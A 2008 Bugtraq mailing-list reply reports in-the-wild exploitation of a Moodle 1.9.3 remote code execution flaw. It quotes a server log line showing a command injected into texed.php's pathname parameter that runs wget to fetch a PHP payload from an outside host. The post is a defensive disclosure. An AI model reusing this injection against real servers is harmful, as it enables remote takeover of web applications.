[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Moodle 1.9.3 Remote Code Execution

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Moodle 1.9.3 Remote Code Execution
From: lent@xxxxxxxxxx
Date: Sun, 14 Dec 2008 22:00:03 -0700

Exploit in the wild:

We saw this come across:

216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] "GET 
/filter/tex/texed.php?formdata=foo&pathname=foo\";wget -O 
perso.wanadoo.es/medline/z1.php;echo+\" HTTP/1.1" 404 218


The host perso.wanadoo.es is still host the payload as of [15/Dec/2008:00:14:00 
-0500].

Chris Lent
Tel: +1.212.353.4350

Follow-Ups:
- Re: Moodle 1.9.3 Remote Code Execution
  - From: Jamie Riden

Prev by Date: [TKADV2008-014] MPlayer TwinVQ Processing Stack Buffer Overflow Vulnerability
Next by Date: Multiple XSS Vulnerabilities in World Recipe 2.11
Previous by thread: Moodle 1.9.3 Remote Code Execution
Next by thread: Re: Moodle 1.9.3 Remote Code Execution
Index(es):
- Date
- Thread